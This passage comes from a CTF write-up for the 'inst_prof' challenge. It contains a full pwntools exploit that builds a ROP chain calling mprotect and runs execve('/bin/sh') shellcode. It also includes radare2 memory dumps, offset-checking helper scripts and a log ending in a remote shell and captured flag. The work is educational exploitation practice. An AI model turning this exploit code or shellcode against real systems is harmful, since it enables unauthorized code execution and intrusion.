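The effect of the misalignment can be reproduced without a debugger. This Python 3 sketch rebuilds the 16 bytes that the first dump shows at the row ending in 30d0 and reads a quadword from them at offset 0 and at offset 2, which corresponds to where r15 points. The helper name qword_at is hypothetical.

```python
import struct


def qword_at(mem, offset):
    """Read one little-endian 64-bit value from mem at the given offset."""
    return struct.unpack_from("<Q", mem, offset)[0]


# The two quadwords pxq printed for the row at ...30d0: the last two
# shellcode bytes (0f 05), then the chain entries shifted by two bytes.
mem = struct.pack("<QQ", 0x55ba1eb91bc3050f, 0x55ba1ed930000000)

aligned_view = qword_at(mem, 0)   # what `pxq @ r14` shows for this row
r15_view = qword_at(mem, 2)       # what `pxq @ r15` shows first

print(hex(aligned_view))
print(hex(r15_view))
```

Read at offset 2, the bytes line up as the clean pop rdi gadget address. The chain does not need to be 8-byte aligned to work, since pop and ret simply read 8 bytes from wherever rsp points.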

All that's left is to add the mprotect call and our shellcode address to the ROP chain.

To do that, we have to calculate the offset from [rsp] to make_page_executable :

[0x7f88cc42b000]> ? sym.make_page_executable - [rsp]
-248 0xffffffffffffff08 01777777777777777777410 17179869184.0G fffff000:0f08 -248 "\b\xff\xff\xff\xff\xff\xff\xff" 1111111111111111111111111111111111111111111111111111111100001000 -248.0 -248.000000f -248.000000
[0x7f88cc42b000]> ? [rsp] - sym.make_page_executable
248 0xf8 0370 248 0000:00f8 248 "\xf8" 11111000 248.0 248.000000f 248.000000

Unlike before, our target address is before the loop section's return address, meaning we need to decrement the text section reference address by 0xf8 to get the address of make_page_executable:

p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
for x in range(0xf8):
    p.send("\x49\xff\xcd" + ret) #dec r13

And then add this to our ROP chain:

p.send("\x4d\x89\x6f\x10") #mov [r15+0x10], r13

Now the second stack + rop chain looks like this:

+--------------------------------+ ;r14
|          GOT address           |
+--------------------------------+
|                                |
|           Shellcode            |
|                                |
+--------------------------------+ ;r15
|         pop rdi gadget         |
+--------------------------------+
|          GOT address           |
+--------------------------------+
|  make_page_executable gadget   |
+--------------------------------+

We simply need to get our shellcode address at the end of this rop chain, and then set rsp to the start of our rop chain.

#save current second stack pointer into r13:
p.send("\x4d\x89\xfd" + ret) #mov r13, r15

#advance pointer 3 qwords
for x in range(0x18):
    p.send("\x49\xff\xc5" + ret) #inc r13

#point r14 to our shellcode
for x in range(0x8):
    p.send("\x49\xff\xc6" + ret) #inc r14

#and write shellcode address here:
p.send("\x4d\x89\x75\x00") #mov [r13], r14

I had originally tried mov [r15+0x18], [r14+0x8] , however it turns out you can't do two dereferences in a single mov instruction, so I ended up removing (unnecessarily) both dereferences by splitting the instruction into two explicit mov s. I could have avoided working with the second stack pointer (through r13 ) and simply mov [r15+0x18], r14 , however at the time I didn't notice this.

Now the second stack should be set up like so:

+--------------------------------+
|          GOT address           |
+--------------------------------+ ;r14
|                                |
|           Shellcode            |
|                                |
+--------------------------------+ ;r15
|         pop rdi gadget         |
+--------------------------------+
|          GOT address           |
+--------------------------------+
|  make_page_executable gadget   |
+--------------------------------+ ;r13
|      <shellcode address>       |
+--------------------------------+

And we verify:

[0x7f0e471a5000]> dr r13; dr r14; dr r15
0x56103a1800ea
0x56103a1800a8
0x56103a1800d2
[0x7f0e471a5000]> pxq 0x60 @ r14 - 0x8
0x56103a1800a0  0x000056103a180000  0x4850ec8948c03148  ...:.V..H1.H..PH
0x56103a1800b0  0x69622fffbb48e289  0x08ebc14868732f6e  ..H../bin/shH...
0x56103a1800c0  0x89485250e7894853  0x3bb0e689485750e2  SH..PRH..PWH...;
0x56103a1800d0  0x561039f7ebc3050f  0x56103a1800000000  .....9.V.....:.V
0x56103a1800e0  0x561039f7ea200000  0x56103a1800a80000  .. ..9.V.....:.V
0x56103a1800f0  0x0000000000000000  0x0000000000000000  ................
[0x7f0e471a5000]> pxq 0x30 @ r15
0x56103a1800d2  0x0000561039f7ebc3  0x000056103a180000  ...9.V.....:.V..
0x56103a1800e2  0x0000561039f7ea20  0x000056103a1800a8   ..9.V.....:.V..
0x56103a1800f2  0x0000000000000000  0x0000000000000000  ................
[0x7f0e471a5000]> pd 2 @ [r15]
        0x561039f7ebc3      5f             pop rdi
        0x561039f7ebc4      c3             ret
[0x7f0e471a5000]> pd 6 @ [r15 + 0x10]
    |   ;-- make_page_executable:
    |   0x561039f7ea20      55             push rbp
    |   0x561039f7ea21      ba05000000     mov edx, 5
    |   0x561039f7ea26      be00100000     mov esi, 0x1000    ; rsi
    |   0x561039f7ea2b      4889e5         mov rbp, rsp
    |   0x561039f7ea2e      5d             pop rbp
    `=< 0x561039f7ea2f      e9ecfdffff     jmp sym.imp.mprotect
[0x7f0e471a5000]> pd 16 @ [r15 + 0x18]
        ;-- r14:
        0x56103a1800a8      4831c0         xor rax, rax
        0x56103a1800ab      4889ec         mov rsp, rbp
        0x56103a1800ae      50             push rax
        0x56103a1800af      4889e2         mov rdx, rsp
        0x56103a1800b2      48bbff2f6269.  movabs rbx, 0x68732f6e69622fff
        0x56103a1800bc      48c1eb08       shr rbx, 8
        0x56103a1800c0      53             push rbx
        0x56103a1800c1      4889e7         mov rdi, rsp
        0x56103a1800c4      50             push rax
        0x56103a1800c5      52             push rdx
        0x56103a1800c6      4889e2         mov rdx, rsp
        0x56103a1800c9      50             push rax
        0x56103a1800ca      57             push rdi
        0x56103a1800cb      4889e6         mov rsi, rsp
        0x56103a1800ce      b03b           mov al, 0x3b    ; ';' ; 59
        0x56103a1800d0      0f05           syscall

I use the pd commands above to illustrate that each entry at r15 (save for the GOT address) points to the appropriate address in the executable for our ROP chain. The last pd at [r15 + 0x18] shows my disassembled shellcode. I had to update my shellcode for this challenge to set rsp to point back at the original stack space stored in rbp (the mov rsp, rbp instruction above), because the GOT was no longer marked as writable after the mprotect call (which the stack needs to be, since I used push instructions in my shellcode).
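Since every entry in the chain is a fixed offset from the return address at [rsp], the whole layout can be computed from that single value. The Python 3 sketch below does so and compares the result with the dump above. The function name build_chain is hypothetical, and the return address 0x561039f7eb18 is not printed in that session; I derived it by subtracting 0xab from the pop rdi gadget address.

```python
import struct

POP_RDI_OFF = 0xab         # pop rdi ; ret gadget, relative to [rsp]
MAKE_EXEC_OFF = -0xf8      # make_page_executable, relative to [rsp]
GOT_OFF = 0x2014e8         # start of the GOT, relative to [rsp]
SHELLCODE_OFF = 0xa0 + 8   # shellcode sits after the spare qword at GOT+0xa0


def build_chain(ret_addr):
    """Return the four ROP entries and their packed little-endian form."""
    got = ret_addr + GOT_OFF
    entries = [
        ret_addr + POP_RDI_OFF,    # pop rdi ; ret
        got,                       # page-aligned argument for mprotect
        ret_addr + MAKE_EXEC_OFF,  # make_page_executable(rdi)
        got + SHELLCODE_OFF,       # final ret lands in the shellcode
    ]
    return entries, struct.pack("<4Q", *entries)


entries, packed = build_chain(0x561039f7eb18)
for entry in entries:
    print("0x%016x" % entry)
```

The exploit itself has to build these values with add, inc and dec instructions inside the target process, because the return address is never sent back to us. The sketch is only a way to sanity-check the offsets.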

All that's left is to load our rop chain address in r15 into rsp , and watch it rain shell:

p.send("\x4c\x89\xfc\xc3") #mov rsp, r15; ret

At this point I tested locally and got a shell, before re-instrumenting and ever so slightly refactoring the code to launch it remotely.

The Sweet, Sweet Solution

I thought about refactoring the code so that my brazenly bullheaded way of inputting/running assembly commands would be less obvious, however I decided to just leave it in (more or less) the form it was in when I actually got the flag.

Something I found interesting about the solution for this challenge is that unlike in prior CTFs, we didn't have to rely on any information leakage at all. Indeed, it wasn't until the CTF was over and I saw some others' techniques for solving this challenge that I saw that we could have used the r12 register to leak data (albeit in a slightly obfuscated manner) with the subsequent call to write() that the program made. Also, I now know that pwntools has an asm() function that will simplify my life in the future ;)

#!/usr/bin/env python2
from pwn import *
from time import sleep
from IPython import embed

ret = "\xc3"
testing = True

if testing:
    p = process("./inst_prof")
    #p = remote("127.0.0.1", 9090)
else:
    p = remote("inst-prof.ctfcompetition.com", 1337)
    #context.timeout = 0.2

sleep(5.5)

def writeByteStr(byteString):
    writeCmd = '\x41\xc6\x07' #mov byte [r15], {}
    incCmd = '\x49\xff\xc7' #inc r15
    for b in byteString:
        p.send(writeCmd + b)
        p.send(incCmd + ret)

def shiftR15Qword():
    for x in range(8):
        p.send("\x49\xff\xc7\xc3") #inc r15

def main():
    #read initial output:
    print(p.readline())
    #now program is waiting for our 4 bytes

    #first we create our "2nd stack" where we'll store our ROP
    #chain:
    #get text section reference:
    p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]

    #constant offset from text.seg.ref to GOT:
    #[rsp] + 0x2014e8 == GOT
    #go 0xa0 further than that to get to blank section
    #total == [rsp] + 0x2014e8 + 0xa0 == 0x201588

    #get offset into r14 (r14 is 0 right now):
    p.send("\x49\x01\xf6" + ret) #add r14, rsi  #rsi == 0x1000
    #now double r14 9 times:
    for x in range(0x9):
        p.send("\x4d\x01\xf6" + ret) #add r14, r14

    #now r14 is 0x200000, add another 0x1000:
    p.send("\x49\x01\xf6" + ret) #add r14, rsi

    #0x588 left
    #r11 seems to be 0x246 all the time....
    for x in range(2):
        p.send("\x4d\x01\xde" + ret) #add r14, r11

    #0x5c + 0xa0 left:
    for x in range(0x5c):
        p.send("\x49\xff\xc6" + ret) #inc r14

    #now we have GOT Address, save it:
    p.send("\x4d\x01\xf5" + ret) #add r13, r14

    #clear r14:
    p.send("\x4d\x31\xf6" + ret) #xor r14, r14
    for x in range(0xa0):
        p.send("\x49\xff\xc6" + ret) #inc r14

    #now copy to r15:
    p.send("\x4d\x89\xef" + ret) #mov r15, r13
    #now add r15, r14:
    p.send("\x4d\x01\xf7" + ret) #add r15, r14

    #save second stack pointer
    p.send("\x4d\x89\xfe" + ret) #mov r14, r15

    #get r15 past our saved text section ref
    shiftR15Qword()

    #now lets write our shellcode:
    writeByteStr('\x48\x31\xc0\x48\x89\xec\x50\x48\x89\xe2\x48\xbb\xff\x2f' + \
                 '\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x52' + \
                 '\x48\x89\xe2\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05')

    #save GOT address at [r14]:
    p.send("\x4d\x89\x2e" + ret) #mov [r14], r13

    #now we need pop rdi gadget
    #pop rdi == [rsp] + 0xab
    p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
    for x in range(0xab):
        p.send("\x49\xff\xc5" + ret) #inc r13

    #save pop addr on rop stack:
    p.send("\x4d\x89\x2f" + ret) #mov [r15], r13

    #save addr of region to be mprotected as 1st rop gadget arg:
    p.send("\x4d\x8b\x2e" + ret) #mov r13, [r14]
    p.send("\x4d\x89\x6f\x08") #mov [r15+8], r13

    #now we need to call mprotect and jump to shellcode:
    #mprotect is [rsp] - 0xf8
    p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
    for x in range(0xf8):
        p.send("\x49\xff\xcd" + ret) #dec r13

    #push mprotect gadget:
    p.send("\x4d\x89\x6f\x10") #mov [r15+0x10], r13

    #save current second stack pointer into r13:
    p.send("\x4d\x89\xfd" + ret) #mov r13, r15

    #advance pointer 3 words
    for x in range(0x18):
        p.send("\x49\xff\xc5" + ret) #inc r13

    #point r14 to our shellcode
    for x in range(0x8):
        p.send("\x49\xff\xc6" + ret) #inc r14

    #and write shellcode address here:
    p.send("\x4d\x89\x75\x00") #mov [r13], r14

    #embed()

    #now we set rsp == r15 and let it "rip"..heh
    p.send("\x4c\x89\xfc\xc3") #mov rsp, r15; ret

    p.interactive()

if __name__ == "__main__":
    main()

And here is what it looked like running it:

-> % ./solver.py
[+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
initializing prof...ready
[*] Switching to interactive mode
b\x10\x00\x00\x00\x00\x00\x00Y\x00\x00...
...<redacted lots of bytes>...
...\x00\x00\x00\x00\x00�\x00\x00\x00\x00\x00\x00\x11\x ls
$ ls
flag.txt
inst_prof
$ cat flag.txt
CTF{0v3r_4ND_0v3r_4ND_0v3r_4ND_0v3r}
$ exit
[*] Got EOF while reading in interactive

Post-Exploitation

Overall I found this challenge quite instructive, further deepening my understanding of libc function calls, system calls, and x86 in general. I'd like to thank Google for putting on such a fun CTF, as well as my friend Ambrose for staying up with me and working on such a large part of this challenge.

Of course I wouldn't have been able to do this without the proper tools, so I thank the radare2 team for such a great tool, as well as the Pwntools team for theirs.

Please let me know if there are any parts of this writeup that are unclear, or worse, incorrect, and I'll be glad to try fixing them, as well as glad to know that someone has read some of it. I hope that there is something in here that helps you too.

Until next time!

-Chris